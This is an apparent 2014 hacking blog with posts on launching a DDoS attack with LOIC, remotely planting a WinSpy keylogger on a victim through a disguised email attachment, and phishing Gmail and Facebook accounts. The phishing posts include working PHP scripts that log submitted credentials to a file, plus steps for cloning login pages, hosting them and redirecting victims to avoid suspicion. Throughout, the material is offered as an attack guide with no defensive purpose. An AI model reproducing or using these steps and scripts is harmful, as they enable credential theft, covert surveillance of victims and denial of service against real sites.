Thursday 13 November 2014

Launching A DDOS Attack
Here I will show you an example on how a hacker can use LOIC to launch a DDOS attack. It attempts to DDoS the target site by sending TCP, UDP, or HTTP requests until the site is completely down.


1.First of all the hacker will choose a target and then click on Lock on button.

2.Next the hacker will keep the threads to 9001 for maximum efficiency.

3.Next he/she will click on the big button “IMMA CHARGIN MAH LAZER”

Now it will start the attack and keep attacking until the site is completely down.
The “requested” number is how many it has pinged the site. The “failed” number is
how many times the site has failed to respond. If the number increasing is only the
failed number then the site is completely down.

Tuesday 11 November 2014



Keylogger
A Keylogger is a hardware or software device which monitors every keystroke , screen shots , chats etc typed on the computer. A keylogger program does not require physical access to the user's computer. Any person with a basic knowledge of
computer can use keylogger. keyloggers may be are classified in to two different types:
1.Hardware keyloggers
2.Software keyloggers


Hardware keyloggers -
Hardware keyloggers are used for keystroke logging. They plug in between a
computer keyboard and record all keystrokes, Chats, email passwords and other sensitive information.

A hardware keylogger is looks like a usb or other peripheral device so the victim can never doubt that it is a keylogger. The hardware keylogger has an inbuilt memory which stores the sensitive information.

Below is an image of a hardware keylogger for your convenience:
A keylogger must be installed keyboard plug and the USB or PS/2 port socket. The
following image shows how a hardware keylogger gets installed.
Software keyloggers:
Software keyloggers are also used for keystroke capturing and recording. But unlike hardware keyloggers we need to install it on a victims computer to receive keystrokes. This process is also called remote monitoring.

SniperSpy is the industry leading keylogger software combined with the Remote Install and Remote Viewing feature. Once installed on the remote PC(s) you wish, you only need to login to your own personal SniperSpy account to view activity logs of the remote PC’s!. This means that you can view logs of the remote PC’s from anywhere in the world as long as you have internet access!



Winspy keylogger:
WinSpy Software is a Complete Stealth Monitoring Software that can both monitor your Local PC and Remote PC. It includes Remote Install and Real-time Remote PC Viewer. Win Spy Software will capture anything the user sees or types on the keyboard. Below I will show you the exact method to install a winspy keylogger on a victim computer remotely.

Step 1:
First of all you need to Download winspy keylogger

Step 2:
After downloading winspy keylogger run the application. On running, a dialog box will be prompted. Now, create an user-id and password on first run and hit apply password. Remember this password as it is required each time you start Winspy and even while uninstalling.
Step 3:
Now, another box will come, explaining you the hot keys(Ctrl + Shift +F12) to start the Winspy keylogger software.


Step 4:
Now pressing on the hot keys will take you a login box asking you to enter the username and pasword. Enter the username and password and click ok

.
Step 5:
On entering the username and password you will be taken to winspy main screen.
Now select Remote at top and click on Remote install.
 
Step 6:
On doing this you will be taken to the Remote install file creator. Enter the following things there:
User – Type in the victims name.

File Name – Here you need to enter the name of file needs to be sent. Like I have kept the name “Funny joke” which the victim will love to accept.

File icon – You really don’t need to change this.

Picture – Select the picture you want to insert to the remote file.

Email log to – In this field enter your email address which you will use to receive the keystrokes. I recommend here to use a gmail account because Hotmail did not accept remote files.

Step 7:
After you have done all the above steps, click on “Create remote file”.
Now the remote file will be created, it will look something like this.
 
Now you just have to sent the victim your remote file via email attachment or by uploading it to a web-hosting site and then sending victim the download link. Once the remote file gets installed into victims computer, you will receive keystrokes on regular basis.

Note:Your antivirus may recognize winspy as a virus. So its recommended that

you disable your antivirus before installing winspy.
How to hack a Gmail account???


1.     Firstly you would choose a target. The most popular target for phishing attacks are email services such as Hotmail and Gmail because they are the most common and once you gets access to the victims email, you can make a lot of trouble for him.
2.     After choosing the target, you will go to the site and save the whole main page.
Here I choose Gmail.
Firstly go to the website www.gmail.com and save the page as index.htm. The reason you want to name it “index” is so when you upload it to a web hosting site and someone goes to your link, the index page is the first page that shows up.

3.       Now you would create a PHP script.it will looks like this:
<?php
Header(“Location: https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&bsv=1k96igf4806cy&ltmpl=default&ltmplcache=2 “);
$handle = fopen(“list.txt”, “a”);
Foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
Fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>

Save this PHP script with name phish.php.
4.     Create a new empty text file and name it list.txt.
5.     So far you would see the following in your folder:


6.     Now open the file index.php and edit some words.
Rename this file to phish.php and in the file find action and you would see the following :


Change the link between action=”” to phish.php and change the method=”” to get.
7.     Save and close the file.
8.     Next you would upload the files to a free webhosting site that supports PHP.
9.      Once all the files are uploaded, you must give writing permissions to the “list.txt” file

10.                        Once everything is up and ready to go, go to the link your host provided you for your website and you should see the Gmail page replica. Type in a username/password and click Sign in. This should have redirected you to the real Gmail page.


If someone goes to your page or if you will send the victim o login through that page. Once the victim goes through your link you can see gher id and password like this.

Monday 10 November 2014

How to hack a Facebook account by phishing method????

          Breaking from the internet in computer network

Firstly to make anonymous yourself it must. Search for proxy like services. Here I am referring some proxies which can help you to be anonymous at the internet.



Proxy service first:
Proxy=85.17.141.35
Port=80
Homepage= any homepage working in your area like
203.115.112.5, 203.115.112.25


Proxy service second:
Proxy=69.195.138.144
Port=80
Homepage= any homepage working in your area like
203.115.112.5, 203.115.112.25










                          Phishing

Phishing is a method to obtain sensitive usernames and passwords, credit card numbers, bank accounts etc.
A case shows that about 80% of email accounts such as Facebook, yahoo, Hotmail etc. get hacked with the phishing method.



First method: fake login pages
In this method a hacker creates a fake page of any website such as PayPal, yahoo, Gmail, Facebook, orkut etc. similar to the original and asks the victim to login through that page.
Once the victim login through that page his email id and password gets stored and hence gets his account hacked.













Here I am taking an example:
    1Firstly choose a target. Here I choose facebook.com which is most popular target among all.


2.     Next you would go to the target site i.e. Facebook and right click on it and click on view source.













3.     Now you would copy the source it into a WordPad or notepad and rename it with like facebook.htm (here I use WordPad).




4.     Now open Facebook.htm in a WordPad. Right click the file and click on open with and select WordPad. Now search for “Form method” you will see something like this:

Now change the action=http://login.facebook.com/login.php” to “Pass.php” and change method=“post” to “Get”.


5.     Next you would hacker create a PHP script which would save the entered username and password and save it something like pass.php. The code for the script is:


<? php /* Created on: 11/11/2014 */
$fp = fopen("FacebookPasswords.htm", "a");
fwrite($fp, "Email:$_POST[email]\password:
$_POST[pass]");
Echo "<HTML>
<Head>
<title>Welcome to Facebook</title>
<FRAMESET cols=\"*\">
<FRAME SRC=\"http://www.google.com\"
</FRAMESET>";?>

Note: here http://www.google.com is the redirection URL when the victim will enter his username and password in the fake page he will be redirected tp www.google.com so he won’t become suspicious.

6.     Now you would create an account on webhosting site that supports php to upload the files. Some of popular free hosting sites are:
1. www.110mb.com
2. www.ripway.com
3. www.t35.com

7.   Next you would upload the two files facebook.htm and pass.php to one of these sites.
              


8.     Once you have uploaded both the files to a webhosting site.




9.     Now as you can see that http://h1.ripway.com/pawan/Facebook.htm is the fake page which the hacker will sent to the victim. Once the victim will enter his username and password it will be saved in a .txt file




10.    Now the hacker will just download the file and view the saved password inside.